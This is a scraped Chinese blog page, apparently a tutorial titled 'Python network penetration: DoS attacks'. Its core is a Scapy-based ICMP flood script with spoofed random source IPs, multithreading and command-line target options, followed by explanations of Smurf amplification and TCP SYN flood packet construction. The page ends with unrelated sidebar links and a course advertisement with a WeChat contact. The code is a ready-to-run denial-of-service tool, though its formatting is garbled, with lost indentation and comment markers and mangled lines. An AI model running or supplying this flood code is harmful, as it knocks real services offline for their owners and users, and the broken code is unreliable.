- 1Unity 基础 之 IDragHanlder 简单实现 UGUI 元素随着鼠标移动,拖动的效果_idraghandler
- 2AI绘画Stable Diffusion换脸插件ReActor 不香了,新一代换脸神器 InstantID!
- 3JAVA_HOME is not set and could not be found_starting namenodes on [localhost]localhost: error:
- 4MacOS安装多个Python版本导致Python3: Command not found_python3-config: command not found
- 5Java后端一些常见的软件安装教程合集(后期可能会继续更新)_后端按照软件
- 6轨迹规划 | 图解路径跟踪PID算法(附ROS C++/Python/Matlab仿真)_matlab pid轨迹跟踪
- 7【视频】LSTM模型原理及其进行股票收盘价的时间序列预测讲解|附数据代码
- 8内网穿透的应用-如何使用Docker本地部署Dify LLM结合内网穿透实现公网访问本地开发平台_difydocker部署
- 9Hadoop启动报Error: JAVA_HOME is not set and could not be found解决办法
- 10顺序表-c语言实现_c语言顺序表
python网络渗透之:DOS攻击篇_ddos攻击脚本(1),超通俗解析_一键ddos脚本
赞
踩
time.sleep(1)
if name == ‘main’:
main()
time.sleep(2)
下面给出代码的解析:
一、 导入需要的库
from scapy.all import *;
from scapy.layers.inet import *
from random import randint,choice
from threading import Thread
import time
二、定义一个类IFD,包含icmp_dos_log()、create_ip()和send_data_package()三个方法
class IFD():
def init(self):
pass
def icmp_dos_log(self):
返回攻击脚本的log界面及使用说明
log =“”"
___ ____ __ __ ____ ____ ___ ____ options:
|_ / | / | _ \ | _ \ / _ / | --appoint ip:
| | | | |/| | |) | | | | | | | _ \ -d >> -d[objective ip]
| | || | | | __/ | || | || |) | --appoint send package number(recommend even):
|_|| ||| |/ ___/|_/ -o >> -o[number]
version: v_1.1 developer: hare
“”"
return log
随机生成源IP地址
def create_ip(self):
from ipaddress import ip_network
self.ip_pool = []
r_ip = ip_network(f"{randint(0,255)}.{randint(0,255)}.{randint(0,255)}.0/24")
for ip in r_ip:
将生成的IP网络地址池加入到ip_pool列表中
self.ip_pool.append(ip)
返回随机选择的IP地址
return str(choice(self.ip_pool))
def send_data_package(self,ip_dst,sp_num):
global data_package_number
将要发送的数据包数量除以2,因为会有两个线程分别发送,为了避免重复,每个线程发送数据包数量为总数的一半。
sp_num = int(int(sp_num)/2)
for i in range(sp_num):
#调用create_ip生成源ip地址,使每次发包产生不同的源ip地址
ip_src = self.create_ip()
构造ICMP数据包
data_package = IP(src = ip_src , dst = ip_dst , id = randint(1000,2000))/ICMP(id = randint(1000,2000) , seq = randint(1000,2000))
发送数据包
send(data_package,verbose=False)
打印发送成功信息
print(f"[+]rip:{ip_src}—>dip:{ip_dst} Ok !")
data_package_number+=1
若数据包数量为奇数,则再发送一份数据包(即多发送一次)
if sp_num%2 != 0:
ip_src = self.create_ip()
data_package = IP(src=ip_src, dst=ip_dst, id=randint(1000, 2000)) / ICMP(id=randint(1000, 2000),seq=randint(1000, 2000))
send(data_package, verbose=False)
print(f"[+]rip:{ip_src}—>dip:{ip_dst} Ok !")
data_package_number += 1
三、定义主函数main()
def main():
import sys
icmp_flood_dos = IFD()
打印攻击脚本的log界面及使用说明
print(icmp_flood_dos.icmp_dos_log())
try:
if sys.argv[1] == “-d” and sys.argv[3] == “-o”:
开始计时
time_1 = time.time()
thread_pool = []
创建两个线程分别发送数据包
for thread in range(2):
dos_thread = Thread(target=icmp_flood_dos.send_data_package,args=(sys.argv[2],sys.argv[4]))
dos_thread.start()
将两个线程加入到线程池中
thread_pool.append(dos_thread)
等待两个线程执行完毕
for tp in thread_pool:
tp.join()
结束计时
time_2 = time.time()
times = time_2-time_1
打印攻击所用时间和发送数据包数量
print(f"\r\n[*]The runtime of this attack is:({times})
效果如图所示:
扩展介绍:Smurf攻击(ICMP放大反射)
Smurf攻击是旨在通过发送大量伪造的ICMP回应数据报给一个或多个目标IP地址来使其宕机。这种攻击方式得名于使用了一种叫做“Smurf程序”的工具。Smurf攻击就是属于DDOS攻击的一种。
Smurf攻击的原理是利用了ICMP Echo Request消息(即Ping请求),当有大量的Echo Request消息被发送到网上广播地址(Broadcast Address),所有收到此消息的主机都会向源IP地址回复并返回ICMP Echo Reply消息(即Ping响应)。如果攻击者将源IP地址设置为目标IP地址,那么目标主机就会接收到所有由网络中的主机发出的Ping响应流量,从而导致目标主机因为过多的Ping响应而无法正常工作,甚至可能导致系统崩溃。因此我们称这种攻击也叫ICMP放大反射攻击。我们可以通过一张图片来简要了解Smurf攻击:‘
Smurf攻击可以轻易地实现分布式攻击,只需要攻击者控制一些感染了Smurf程序的“僵尸”计算机,然后协同这些计算机一起对目标进行攻击。这种攻击方式不仅容易发动,而且攻击效果也非常显著,因此Smurf攻击曾经在过去的网络攻击事件中频繁出现,但随着防御技术的提高和安全意识的增强,Smurf攻击已经逐渐减少。
TCP SYN Flood DOS
我们先来介绍以下什么是“TCP SYN Flood DOS”:
- TCP SYN Flood DOS也可以叫做“TCP SYN攻击”,这种攻击实质上是利用了TCP协议的漏洞也就是TCP连接中的“三次握手”中的漏洞来进行攻击的。攻击者通过发送大量的“SYN”连接请求,使目标主机对各个请求发送“SYN+ACK”的请求加响应,然后攻击者对目标主机的ACK请求不做对应的响应(攻击者通常将源IP伪装成不可达的IP)使得目标主机重复发送ACK给攻击者,由于攻击者发送了大量的这种TCP连接,而每一次都无法完成三次握手,在服务器上,这些TCP连接会因为“挂起状态”而消耗CPU和内存,最后服务器可能死机,就无法为正常用户提供服务了,同时我们也称这种连接叫做“SYN半连接状态”。
对于不太了解TCP三次握手四次挥手的读者,可以参考我的《网络通信之:TCP三次握手四次挥手》这篇文章
善意的TCP三次握手连接是这样的:
恶意的TCP三次握手连接是这样的:
我们再详细的谈谈攻击者是如何让目标主机拒绝服务的:
- 首先攻击者伪装不可达的IP地址,向目标主机发送SYN同步信息
- 在目标主机上会有一个缓存,这个缓存用于存储发送过来的SYN同步信息,接着就向攻击者发送SYN+ACK的数据包
- 由于目标主机使用的是伪装的不可达的IP,所以这个SYN+ACK的数据包就不会被接收到,那么目标主机发送的SYN同步信息就像落入一个黑洞一样自然就不会被响应,在RTT往返时间范围之内,当攻击者没有及时响应服务器发送的SYN+ACK包时,服务器会认为连接建立失败,并等待一段时间再进行释放SYN半开连接信息。
- 那我们设想这么一个场景:如果攻击者在RTT往返时间范围之内发送大量的这种SYN半开连接信息,以至于将目标主机的缓存填满,使得合法的连接请求无法得到处理,这就可能会导致目标主机无法正常的被访问,导致拒绝服务。
**RTT(Round Trip Time)往返时间:**RTT往返时间指的是从客户端发送FIN包到客户端接收到服务器的ACK包的时间。在局域网内或者高速广域网上,RTT往返时间通常较低,可以在几毫秒甚至几十毫秒内完成。而在全球范围内进行数据传输时,RTT往返时间可能会增加到数百毫秒、甚至更高,一般的RTT往返时间是没有一个确定的值的,需要根据具体情况进行评估和优化。
对于响应的攻击代码,与之前的ICMP Flood attack相似,这里给出核心:
说一下这个包的构造过程:
- 对于src我们是使用随机的ip来产生的,在IP数据包后面我们跟上的是TCP数据包,主要指定了sport(源端口)和dport(目的端口)以及flags值指定为‘S’(SYN包),seq(初始序列号)。
然后我们正常的使用while True 或者 for来循环发送数据包,效果如图所示:
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
486d4c3ab8389e65ecb71ac0)
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
